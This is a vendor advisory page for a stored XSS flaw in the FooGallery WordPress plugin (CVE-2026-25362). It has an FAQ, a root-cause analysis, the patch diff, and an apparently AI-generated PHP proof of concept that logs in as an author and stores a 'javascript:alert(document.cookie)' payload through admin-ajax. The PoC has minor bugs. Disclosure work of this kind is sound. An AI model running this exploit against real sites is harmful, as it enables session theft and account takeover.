What is CVE-2026-25362?

CVE-2026-25362 is a stored cross-site scripting (XSS) vulnerability found in the FooGallery plugin for WordPress, affecting versions up to and including 3.1.11. It allows authenticated users with author-level access to inject malicious JavaScript into gallery pages, which executes when other users view those pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s handling of custom URL and target fields. An attacker can submit malicious scripts through AJAX endpoints, which are then stored in the database and executed in the context of users accessing the compromised gallery.

Who is affected by this vulnerability?

Any WordPress site using the FooGallery plugin version 3.1.11 or earlier is vulnerable. Specifically, users with author-level privileges or higher can exploit this vulnerability to inject scripts, potentially affecting all users who view the affected galleries.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the FooGallery plugin installed. If it is 3.1.11 or earlier, your site is at risk. Additionally, review any custom gallery URLs or targets for unexpected scripts.

How can I fix this vulnerability?

The vulnerability is patched in FooGallery version 3.1.13. Update your plugin to this version or later to ensure that the input sanitization and output escaping measures are in place to protect against this XSS vulnerability.

What does the CVSS score of 6.4 mean?

The CVSS score of 6.4 indicates a medium severity level for this vulnerability. This suggests that while the vulnerability requires authenticated access to exploit, it can still lead to significant risks such as session hijacking or account takeover if successfully executed.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the context of authenticated users. This can lead to session hijacking, content manipulation, and potentially escalate privileges, particularly on multi-author sites.

How does the proof of concept demonstrate the issue?

The proof of concept provided outlines a method for an authenticated user to inject malicious scripts into gallery fields by exploiting the vulnerable AJAX endpoints. It illustrates the steps an attacker would take to authenticate and submit harmful payloads that persist in the database.

What are the key files affected by this vulnerability?

The primary files affected include class-metaboxes.php and class-attachment-fields.php, where unsanitized user input is directly stored. These files lack proper validation and escaping, making them susceptible to XSS attacks.

What additional security measures should I consider?

In addition to updating the FooGallery plugin, consider implementing security plugins that monitor for XSS vulnerabilities, regularly auditing user permissions, and ensuring that all user inputs are sanitized and validated across your WordPress site.

Is this vulnerability common in WordPress plugins?

Yes, stored XSS vulnerabilities are not uncommon in WordPress plugins, especially those that allow user-generated content. It highlights the importance of rigorous input validation and output escaping practices in plugin development.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the FooGallery plugin temporarily to mitigate risks. Additionally, review user permissions and limit access to trusted users only until the vulnerability can be addressed.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-25362: FooGallery <= 3.1.11 – Authenticated (Author+) Stored Cross-Site Scripting (foogallery)

CVE ID CVE-2026-25362

Plugin foogallery

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.1.11

Patched Version 3.1.13

Disclosed February 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25362:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the FooGallery WordPress plugin versions up to and including 3.1.11. The issue resides in the plugin’s handling of custom URL and target fields for gallery attachments. An attacker with author-level privileges or higher can inject malicious JavaScript payloads that execute when a user views a compromised gallery page. The CVSS score of 6.4 reflects the medium severity of this authenticated attack vector.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping in multiple file paths. The primary vulnerable functions are `gallery_details_save()` in `/foogallery/extensions/albums/admin/class-metaboxes.php` (lines 564-578) and `edit_attachment_custom_fields()` in `/foogallery/includes/admin/class-attachment-fields.php` (lines 190-232). These functions directly stored unsanitized user input from POST parameters `custom_url` and `custom_target` into post meta without proper validation. The `load_custom_class_meta()` function in `/foogallery/includes/class-foogallery-attachment-custom-class.php` (line 72) also lacked output escaping when retrieving the stored data.

Exploitation requires an authenticated attacker with author privileges to access the gallery editing interface. The attacker would submit malicious payloads through the AJAX endpoints `ajax_save_gallery_details` (action: `foogallery_album_gallery_details`) or the media attachment edit form. For XSS via custom URL, the payload would be injected into the `custom_url` field using JavaScript URIs like `javascript:alert(document.cookie)` or data URIs containing script code. The custom target field could also be exploited through attribute injection payloads. These payloads persist in the database and execute when the gallery renders on the frontend.

The patch introduces comprehensive input sanitization and output escaping across multiple components. New sanitization functions `foogallery_sanitize_attachment_custom_url()` and `foogallery_sanitize_attachment_custom_target()` were added to `/foogallery/includes/functions.php` (lines 1513-1548). These functions apply `esc_url_raw()` for URLs and `sanitize_key()` with whitelist validation for target values. The patch also adds proper output escaping in `load_custom_class_meta()` using `foogallery_sanitize_javascript()`. Additionally, the patch implements stricter capability checks in several AJAX handlers to prevent unauthorized access.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of authenticated users viewing compromised galleries. This can lead to session hijacking, account takeover, content manipulation, and privilege escalation. Since the payloads are stored in the database, they affect all users who view the injected gallery pages. The vulnerability particularly impacts multi-author WordPress sites where authors have gallery management permissions but should not be able to inject malicious scripts.

Differential between vulnerable and patched code

Code Diff

--- a/foogallery/extensions/albums/admin/class-metaboxes.php
+++ b/foogallery/extensions/albums/admin/class-metaboxes.php
@@ -408,12 +408,46 @@
 			}
 		}

+		/**
+		 * Validate incoming AJAX context for album gallery details requests.
+		 *
+		 * Reviewers : please note that we cannot check if the gallery belongs to the album, as the user might be in the process of creating an album
+		 *
+		 * @return array|false
+		 */
+		private function validate_gallery_details_ajax_context() {
+			$album_id      = isset( $_POST['foogallery_album_id'] ) ? absint( wp_unslash( $_POST['foogallery_album_id'] ) ) : 0;
+			$foogallery_id = isset( $_POST['foogallery_id'] ) ? absint( wp_unslash( $_POST['foogallery_id'] ) ) : 0;
+
+			if ( $album_id <= 0 || $foogallery_id <= 0 ) {
+				return false;
+			}
+
+			if ( ! current_user_can( 'edit_post', $album_id ) || ! current_user_can( 'edit_post', $foogallery_id ) ) {
+				return false;
+			}
+
+			$album   = FooGalleryAlbum::get_by_id( $album_id );
+			$gallery = FooGallery::get_by_id( $foogallery_id );
+
+			if ( false === $album || false === $gallery ) {
+				return false;
+			}
+
+			return array(
+				'album_id'      => $album_id,
+				'foogallery_id' => $foogallery_id,
+				'gallery'       => $gallery,
+			);
+		}
+
 		public function ajax_get_gallery_details() {
 			if ( check_admin_referer( 'foogallery_album_gallery_details' ) ) {
-				$foogallery_id = intval( $_POST['foogallery_id'] );
-				$gallery = FooGallery::get_by_id( $foogallery_id );
+				$context = $this->validate_gallery_details_ajax_context();

-				if ( false !== $gallery ) {
+				if ( false !== $context ) {
+					$foogallery_id = $context['foogallery_id'];
+					$gallery       = $context['gallery'];
 					$fields = $this->get_gallery_detail_fields( $gallery ); ?>
 					<form name="foogallery_gallery_details">
 					<input type="hidden" name="foogallery_id" id="foogallery_id" value="<?php echo esc_attr( $foogallery_id ); ?>" />
@@ -511,22 +545,39 @@

 		public function ajax_save_gallery_details() {
 			if ( check_admin_referer( 'foogallery_album_gallery_details' ) ) {
-				$foogallery_id = $_POST['foogallery_id'];
-				$gallery       = FooGallery::get_by_id( $foogallery_id );
-				if ( false !== $gallery ) {
-					$fields = $this->get_gallery_detail_fields( $gallery );
-
-					foreach ( $fields as $field => $values ) {
-						//for every field, save some info
-						do_action( 'foogallery_album_gallery_details_save', $field, $values, $gallery );
-					}
+				$context = $this->validate_gallery_details_ajax_context();
+				if ( false === $context ) {
+					wp_send_json_error( array(
+						'message' => __( 'Invalid gallery details request.', 'foogallery' ),
+					), 403 );
 				}
+
+				$gallery = $context['gallery'];
+				$fields  = $this->get_gallery_detail_fields( $gallery );
+
+				foreach ( $fields as $field => $values ) {
+					//for every field, save some info
+					do_action( 'foogallery_album_gallery_details_save', $field, $values, $gallery );
+				}
+
+				wp_send_json_success();
 			}
 		}

 		public function gallery_details_save($field, $field_args, $gallery) {
+			if ( ! isset( $_POST[$field] ) ) {
+				return;
+			}
+
 			if ( 'custom_url' === $field || 'custom_target' === $field ) {
-				$value = $_POST[$field];
+				$value = wp_unslash( $_POST[$field] );
+
+				if ( 'custom_url' === $field ) {
+					$value = esc_url_raw( $value );
+				} else {
+					$value = sanitize_key( $value );
+				}
+
 				update_post_meta( $gallery->ID, $field, $value );
 			}
 		}
--- a/foogallery/extensions/import-export/class-foogallery-import-export.php
+++ b/foogallery/extensions/import-export/class-foogallery-import-export.php
@@ -466,6 +466,12 @@
 		 */
 		public function ajax_generate_export() {
 			if ( check_admin_referer( 'foogallery_gallery_export' ) ) {
+				if ( ! current_user_can( 'manage_options' ) ) {
+					wp_send_json_error( array(
+						'message' => __( 'You do not have permission to export galleries.', 'foogallery' ),
+					), 403 );
+				}
+
 				if ( isset( $_POST['galleries'] ) ) {
 					$galleries = array_map( 'sanitize_text_field', wp_unslash( $_POST['galleries'] ) );
 					echo foogallery_generate_export_json( $galleries ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- JSON output
--- a/foogallery/foogallery.php
+++ b/foogallery/foogallery.php
@@ -3,7 +3,7 @@
 /*
 Plugin Name: FooGallery
 Description: FooGallery is the most intuitive and extensible gallery management tool ever created for WordPress
-Version:     3.1.11
+Version:     3.1.13
 Author:      FooPlugins
 Plugin URI:  https://fooplugins.com/foogallery-wordpress-gallery-plugin/
 Author URI:  https://fooplugins.com
@@ -24,7 +24,7 @@
         define( 'FOOGALLERY_PATH', plugin_dir_path( __FILE__ ) );
         define( 'FOOGALLERY_URL', plugin_dir_url( __FILE__ ) );
         define( 'FOOGALLERY_FILE', __FILE__ );
-        define( 'FOOGALLERY_VERSION', '3.1.11' );
+        define( 'FOOGALLERY_VERSION', '3.1.13' );
         define( 'FOOGALLERY_SETTINGS_VERSION', '2' );
         require_once FOOGALLERY_PATH . 'includes/constants.php';
         require_once FOOGALLERY_PATH . 'includes/functions.php';
--- a/foogallery/gutenberg/class-foogallery-blocks.php
+++ b/foogallery/gutenberg/class-foogallery-blocks.php
@@ -48,10 +48,16 @@

             $path = FOOGALLERY_PATH . 'gutenberg/assets/blocks';
             $url = FOOGALLERY_URL . 'gutenberg/assets/blocks';
-            $asset = require_once( $path . '.asset.php' );
+            $asset = require( $path . '.asset.php' );
+            if ( ! is_array( $asset ) ) {
+                $asset = array(
+                    'dependencies' => array(),
+                    'version' => false,
+                );
+            }

-            if ( is_array( $asset[ 'dependencies' ] ) ){
-                $asset[ 'dependencies' ][] = 'foogallery-core';
+            if ( isset( $asset['dependencies'] ) && is_array( $asset['dependencies'] ) ){
+                $asset['dependencies'][] = 'foogallery-core';
             }

 			// Scripts.
--- a/foogallery/includes/admin/class-attachment-fields.php
+++ b/foogallery/includes/admin/class-attachment-fields.php
@@ -190,7 +190,15 @@

 		    // If our fields array is not empty
 		    if ( ! empty( $custom_fields ) ) {
-			    // We browse our set of options
+
+				$post_id = absint( $post['ID'] );
+
+				// get out early if we don't have a post id or we don't have permission to edit it.
+				if ( $post_id === 0 || !current_user_can( 'edit_post', $post_id ) ) {
+					return $post;
+				}
+
+				// We browse our set of options
 			    foreach ( $custom_fields as $field => $values ) {
 				    switch ( $values['input'] ) {
 					    case 'text':
@@ -200,18 +208,28 @@
 					    case 'checkbox':
 						    // If this field has been submitted (is present in the $attachment variable)
 						    if ( isset( $attachment[$field] ) ) {
+							    $value = wp_unslash( $attachment[ $field ] );
+
+							    if ( 'foogallery_custom_url' === $field ) {
+								    $value = foogallery_sanitize_attachment_custom_url( $value );
+							    } elseif ( 'foogallery_custom_target' === $field ) {
+								    $value = foogallery_sanitize_attachment_custom_target( $value );
+							    } else {
+									$value = sanitize_text_field( $value );
+								}
+
 							    // If submitted field is empty
 							    // We add errors to the post object with the "error_text" parameter if set in the options
-							    if ( strlen( trim( $attachment[$field] ) ) == 0 && isset( $values['error_text'] ) ) {
+							    if ( strlen( trim( $value ) ) == 0 && isset( $values['error_text'] ) ) {
 								    $post['errors'][ $field ]['errors'][] = __( $values['error_text'] );
 								    // Otherwise we update the custom field
 							    } else {
-								    update_post_meta( $post['ID'], '_' . $field, $attachment[ $field ] );
+								    update_post_meta( $post_id, '_' . $field, $value );
 							    }
 						    }
 						    // Otherwise, we delete it if it already existed
 						    else {
-							    delete_post_meta( $post['ID'], $field );
+							    delete_post_meta( $post_id, '_' . $field );
 						    }
 					        break;

@@ -224,4 +242,4 @@
 		    return $post;
 	    }
     }
-}
 No newline at end of file
+}
--- a/foogallery/includes/admin/class-gallery-attachment-modal.php
+++ b/foogallery/includes/admin/class-gallery-attachment-modal.php
@@ -331,11 +331,13 @@
 				}

 				if ( array_key_exists( 'custom-url', $data ) ) {
-					update_post_meta( $img_id, '_foogallery_custom_url', $data['custom-url'] );
+					$custom_url = foogallery_sanitize_attachment_custom_url( wp_unslash( $data['custom-url'] ) );
+					update_post_meta( $img_id, '_foogallery_custom_url', $custom_url );
 				}

 				if ( array_key_exists( 'custom-target', $data ) ) {
-					update_post_meta( $img_id, '_foogallery_custom_target', $data['custom-target'] );
+					$custom_target = foogallery_sanitize_attachment_custom_target( wp_unslash( $data['custom-target'] ) );
+					update_post_meta( $img_id, '_foogallery_custom_target', $custom_target );
 				}

 				if ( array_key_exists( 'custom-class', $data ) ) {
--- a/foogallery/includes/admin/class-menu.php
+++ b/foogallery/includes/admin/class-menu.php
@@ -118,6 +118,12 @@
 		function create_demo_galleries() {
 			if ( check_ajax_referer( 'foogallery_admin_import_demos' ) ) {

+				if ( ! current_user_can( 'manage_options' ) ) {
+					wp_send_json_error( array(
+						'message' => __( 'You do not have permission!', 'foogallery' ),
+					), 403 );
+				}
+
 				$results = foogallery_create_demo_content();

 				if ( $results === false ) {
--- a/foogallery/includes/class-foogallery-attachment-custom-class.php
+++ b/foogallery/includes/class-foogallery-attachment-custom-class.php
@@ -69,7 +69,7 @@
 		public function load_custom_class_meta( $foogallery_attachment, $post ) {
 			$custom_class = get_post_meta( $post->ID, '_foogallery_custom_class', true );
 			if ( !empty( $custom_class ) ) {
-				$foogallery_attachment->custom_class = $custom_class;
+				$foogallery_attachment->custom_class = foogallery_sanitize_javascript( $custom_class );
 			}
 		}
 	}
--- a/foogallery/includes/class-foogallery-attachment.php
+++ b/foogallery/includes/class-foogallery-attachment.php
@@ -49,8 +49,8 @@
 			$this->caption = trim( $post->post_excerpt );
 			$this->description = trim( $post->post_content );
 			$this->alt = trim( get_post_meta( $this->ID, '_wp_attachment_image_alt', true ) );
-			$this->custom_url = get_post_meta( $this->ID, '_foogallery_custom_url', true );
-			$this->custom_target = get_post_meta( $this->ID, '_foogallery_custom_target', true );
+			$this->custom_url = foogallery_sanitize_attachment_custom_url( get_post_meta( $this->ID, '_foogallery_custom_url', true ) );
+			$this->custom_target = foogallery_sanitize_attachment_custom_target( get_post_meta( $this->ID, '_foogallery_custom_target', true ) );
 			$this->load_attachment_image_data( $this->ID );

 			$this->date = !empty( $post->post_date_gmt ) ? $post->post_date_gmt : $post->post_date;
--- a/foogallery/includes/class-foogallery-cache.php
+++ b/foogallery/includes/class-foogallery-cache.php
@@ -210,6 +210,12 @@
 		function ajax_clear_all_caches() {
 			if ( check_admin_referer( 'foogallery_clear_html_cache' ) ) {

+				if ( ! current_user_can( 'manage_options' ) ) {
+					wp_send_json_error( array(
+						'message' => __( 'You do not have permission!', 'foogallery' ),
+					), 403 );
+				}
+
 				$this->clear_all_gallery_caches();

 				esc_html_e('The cache for all galleries has been cleared!', 'foogallery' );
--- a/foogallery/includes/class-override-thumbnail.php
+++ b/foogallery/includes/class-override-thumbnail.php
@@ -81,6 +81,12 @@
                 );
             }

+			if ( ! current_user_can( 'manage_options' ) ) {
+				wp_send_json_error( array(
+					'message' => __( 'You do not have permission!', 'foogallery' ),
+				), 403 );
+			}
+
             $img_id = isset( $_POST['img_id'] ) ? absint( wp_unslash( $_POST['img_id'] ) ) : 0;

             if ( ! $img_id ) {
--- a/foogallery/includes/functions.php
+++ b/foogallery/includes/functions.php
@@ -1506,6 +1506,48 @@
 }

 /**
+ * Sanitize attachment custom URLs before persisting or rendering.
+ *
+ * @since 1.0.0
+ *
+ * @param string $url
+ * @return string
+ */
+function foogallery_sanitize_attachment_custom_url(  $url  ) {
+    if ( !is_string( $url ) ) {
+        return '';
+    }
+    $url = trim( $url );
+    if ( '' === $url ) {
+        return '';
+    }
+    return esc_url_raw( $url );
+}
+
+/**
+ * Sanitize attachment custom target values against known options.
+ *
+ * @since 1.0.0
+ *
+ * @param string $target
+ * @return string
+ */
+function foogallery_sanitize_attachment_custom_target(  $target  ) {
+    if ( !is_string( $target ) ) {
+        return '';
+    }
+    $target = sanitize_key( $target );
+    if ( '' === $target ) {
+        return '';
+    }
+    $target_options = foogallery_get_target_options();
+    if ( array_key_exists( $target, $target_options ) ) {
+        return $target;
+    }
+    return 'default';
+}
+
+/**
  * Sanitize HTML to make it safe to output. Used to sanitize potentially harmful HTML used for captions
  *
  * @since 1.9.23
@@ -1939,10 +1981,10 @@
         $attachment_args['meta_input']['_wp_attachment_image_alt'] = $attachment_data['alt'];
     }
     if ( isset( $attachment_data['custom_url'] ) && !empty( $attachment_data['custom_url'] ) ) {
-        $attachment_args['meta_input']['_foogallery_custom_url'] = $attachment_data['custom_url'];
+        $attachment_args['meta_input']['_foogallery_custom_url'] = foogallery_sanitize_attachment_custom_url( $attachment_data['custom_url'] );
     }
     if ( isset( $attachment_data['custom_target'] ) && !empty( $attachment_data['custom_target'] ) ) {
-        $attachment_args['meta_input']['_foogallery_custom_target'] = $attachment_data['custom_target'];
+        $attachment_args['meta_input']['_foogallery_custom_target'] = foogallery_sanitize_attachment_custom_target( $attachment_data['custom_target'] );
     }
     if ( isset( $attachment_data['video'] ) && !empty( $attachment_data['video'] ) ) {
         $attachment_args['meta_input']['_foogallery_video_data'] = array(
--- a/foogallery/includes/render-functions.php
+++ b/foogallery/includes/render-functions.php
@@ -130,7 +130,7 @@
 		// get the URL to the attachment page.
 		$url = get_attachment_link( $foogallery_attachment->ID );
 	} elseif ( 'custom' === $link ) {
-		$url = $args['custom_link'];
+		$url = foogallery_sanitize_attachment_custom_url( $args['custom_link'] );
 	} else {
 		$url = $foogallery_attachment->url;
 	}
@@ -606,4 +606,4 @@
 	}
 	$html .= '>';
 	return $html;
-}
 No newline at end of file
+}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25362 - FooGallery <= 3.1.11 - Authenticated (Author+) Stored Cross-Site Scripting

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'author_user';
$password = 'author_password';

// Step 1: Authenticate and obtain WordPress nonce
function authenticate_and_get_nonce($base_url, $username, $password) {
    $login_url = $base_url . '/wp-login.php';
    $admin_url = $base_url . '/wp-admin/';
    
    // Create a cookie jar
    $cookie_file = tempnam(sys_get_temp_dir(), 'cookies_');
    
    // Initial request to get login form and nonce
    $ch = curl_init($login_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
    $response = curl_exec($ch);
    
    // Extract the login nonce (wpnonce)
    preg_match('/name="log" value="([^"]+)"/', $response, $log_matches);
    preg_match('/name="pwd" value="([^"]+)"/', $response, $pwd_matches);
    
    // Perform login
    $post_data = array(
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $admin_url,
        'testcookie' => '1'
    );
    
    curl_setopt($ch, CURLOPT_URL, $login_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $response = curl_exec($ch);
    
    // Now access the gallery edit page to get AJAX nonce
    $gallery_url = $base_url . '/wp-admin/post.php?post=1&action=edit';
    curl_setopt($ch, CURLOPT_URL, $gallery_url);
    curl_setopt($ch, CURLOPT_POST, false);
    $response = curl_exec($ch);
    
    // Extract the gallery details nonce
    preg_match('/foogallery_album_gallery_details" value="([a-f0-9]+)"/', $response, $nonce_matches);
    
    curl_close($ch);
    
    if (isset($nonce_matches[1])) {
        return array('nonce' => $nonce_matches[1], 'cookies' => $cookie_file);
    }
    
    return false;
}

// Step 2: Exploit the XSS vulnerability via gallery details save
function exploit_gallery_xss($base_url, $nonce, $cookie_file, $gallery_id = 1, $attachment_id = 1) {
    $ajax_url = $base_url . '/wp-admin/admin-ajax.php';
    
    // XSS payload in custom_url field
    $xss_payload = 'javascript:alert(document.cookie)//';
    
    $post_data = array(
        'action' => 'foogallery_album_gallery_details',
        'foogallery_album_id' => $gallery_id,
        'foogallery_id' => $attachment_id,
        'custom_url' => $xss_payload,
        'custom_target' => '_blank',
        '_wpnonce' => $nonce
    );
    
    $ch = curl_init($ajax_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo "Exploit attempt completed. HTTP Code: $http_coden";
    echo "Response: $responsen";
    
    return $http_code == 200;
}

// Main execution
$auth_data = authenticate_and_get_nonce($target_url, $username, $password);

if ($auth_data && isset($auth_data['nonce'])) {
    echo "Authentication successful. Nonce obtained: {$auth_data['nonce']}n";
    
    $result = exploit_gallery_xss($target_url, $auth_data['nonce'], $auth_data['cookies']);
    
    if ($result) {
        echo "XSS payload successfully injected.n";
        echo "Visit any page displaying the compromised gallery to trigger the payload.n";
    } else {
        echo "Failed to inject XSS payload.n";
    }
    
    // Clean up cookie file
    if (file_exists($auth_data['cookies'])) {
        unlink($auth_data['cookies']);
    }
} else {
    echo "Authentication failed or nonce not found.n";
}

?>

Frequently Asked Questions

What is CVE-2026-25362?
Overview of the vulnerability
CVE-2026-25362 is a stored cross-site scripting (XSS) vulnerability found in the FooGallery plugin for WordPress, affecting versions up to and including 3.1.11. It allows authenticated users with author-level access to inject malicious JavaScript into gallery pages, which executes when other users view those pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s handling of custom URL and target fields. An attacker can submit malicious scripts through AJAX endpoints, which are then stored in the database and executed in the context of users accessing the compromised gallery.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the FooGallery plugin version 3.1.11 or earlier is vulnerable. Specifically, users with author-level privileges or higher can exploit this vulnerability to inject scripts, potentially affecting all users who view the affected galleries.
How can I check if my site is vulnerable?
Steps to identify the issue
To determine if your site is vulnerable, check the version of the FooGallery plugin installed. If it is 3.1.11 or earlier, your site is at risk. Additionally, review any custom gallery URLs or targets for unexpected scripts.
How can I fix this vulnerability?
Mitigation steps
The vulnerability is patched in FooGallery version 3.1.13. Update your plugin to this version or later to ensure that the input sanitization and output escaping measures are in place to protect against this XSS vulnerability.
What does the CVSS score of 6.4 mean?
Understanding severity ratings
The CVSS score of 6.4 indicates a medium severity level for this vulnerability. This suggests that while the vulnerability requires authenticated access to exploit, it can still lead to significant risks such as session hijacking or account takeover if successfully executed.
What are the practical risks of this vulnerability?
Consequences of exploitation
If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the context of authenticated users. This can lead to session hijacking, content manipulation, and potentially escalate privileges, particularly on multi-author sites.
How does the proof of concept demonstrate the issue?
Illustration of exploitation
The proof of concept provided outlines a method for an authenticated user to inject malicious scripts into gallery fields by exploiting the vulnerable AJAX endpoints. It illustrates the steps an attacker would take to authenticate and submit harmful payloads that persist in the database.
What are the key files affected by this vulnerability?
Identifying vulnerable components
The primary files affected include class-metaboxes.php and class-attachment-fields.php, where unsanitized user input is directly stored. These files lack proper validation and escaping, making them susceptible to XSS attacks.
What additional security measures should I consider?
Enhancing WordPress security
In addition to updating the FooGallery plugin, consider implementing security plugins that monitor for XSS vulnerabilities, regularly auditing user permissions, and ensuring that all user inputs are sanitized and validated across your WordPress site.
Is this vulnerability common in WordPress plugins?
Context of XSS vulnerabilities
Yes, stored XSS vulnerabilities are not uncommon in WordPress plugins, especially those that allow user-generated content. It highlights the importance of rigorous input validation and output escaping practices in plugin development.
What should I do if I cannot update the plugin immediately?
Short-term mitigation strategies
If an immediate update is not possible, consider disabling the FooGallery plugin temporarily to mitigate risks. Additionally, review user permissions and limit access to trusted users only until the vulnerability can be addressed.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations